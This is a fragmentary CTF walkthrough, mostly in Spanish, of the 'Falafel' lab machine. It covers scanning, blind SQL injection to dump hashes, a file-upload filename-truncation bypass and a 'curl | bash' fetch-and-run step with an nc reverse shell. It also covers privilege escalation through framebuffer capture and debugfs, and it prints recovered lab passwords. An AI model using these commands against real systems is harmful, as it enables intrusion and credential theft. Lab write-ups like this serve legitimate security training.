
nmap -A -p- -oA falafel --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA falafel

nmap -sU -O -p- -oA falafel-udp

nikto -h

Pasted image 20210903170328.png

Pasted image 20210903171028.png


Pasted image 20210903171151.png

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wfuzz -c -t 200 --hc-404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Pasted image 20210903172241.png

wfuzz -c -t 200 --hc-404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z list,php-txt

Pasted image 20210903172527.png

Pasted image 20210903172636.png

Proxy->Options->Miscellaneous Quitar el ultimo boton Dont send items to Proxy history or live tasks, if out of scope.

Pasted image 20210903174147.png

Target->Scope->Add Agregar

Pasted image 20210903174435.png

Proxy->Intercept->Intercept Server Responses Agregar Intercept responses based on the following rules.

Pasted image 20210903175110.png

Pasted image 20210903184419.png

Usamos admin' and substring(username,1,1)='a'-- -

Pasted image 20210903185259.png

Creamos un cluster bomb para fuerza bruta.

Pasted image 20210903190224.png

Ponemos el siguiente para la parte de numeros.

Pasted image 20210903191630.png

La parte de texto Pasted image 20210903191655.png

Pasted image 20210903211207.png Pasted image 20210903211229.png

Corremos el codigo de arriba y lo ponemos en un archivo llamado exploit.py

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Vamos a crackstation y vemos las credenciales.

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credenciales chris:juggling

Pasted image 20210903211544.png

No se puede hacer mucho con el usuario de chris

Pasted image 20210903211833.png

Guardamos el hash de admin y chris

Pasted image 20210903212637.png

It verifies and has a 0 in the beginning so login es exitoso 0==0

Pasted image 20210903212743.png

Usamos las credenciales en el login.

Pasted image 20210903213513.png

Ahora podemos subir archivos de formato png.

Pasted image 20210903213537.png

Pasted image 20210903213701.png

Quitamos 4 caracteres y hacemos un archivo png

Creamos un archivo con 240 characteres y le damos un formato de php.png

Pasted image 20210904101335.png

Adquirimos los ultimos 4 caracteres

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/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q i2Ai


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Llegue a 240 caracteres y lo guarde

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cat index.html

python3 -m http.server 80

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Al final del cmd ponemos

cmd=curl | bash

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nc -lvnp 443

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credenciales son las siguientes moshe:falafelIsReallyTasty

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su moshe

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uname -a

lsb_release -a

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for group in g$(groups); do echo "El grupo $group"; done

for group in $(groups); do echo -e "\n[+] Listando archivo del sistema con grupo $group asignado:\n; find / \-group $group 2>/dev/null;done

Pasted image 20210904120406.png

find \-name virtual_size 2>/dev/null

cat ./sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0/virtual_size

Pasted image 20210904130814.png

cd /tmp

nc 443 Captura

Pasted image 20210904131225.png

Abrimos el archivo en gimp

Pasted image 20210904131352.png

Vemos que yossi tiene una contrasena: MoshePlzStopHackingMe!

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su yossi


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ls -l /dev/sda1

fdisk -l

Pasted image 20210904134007.png

debugfs /dev/sda1

cd root

cat root.txt

Pasted image 20210904134521.png


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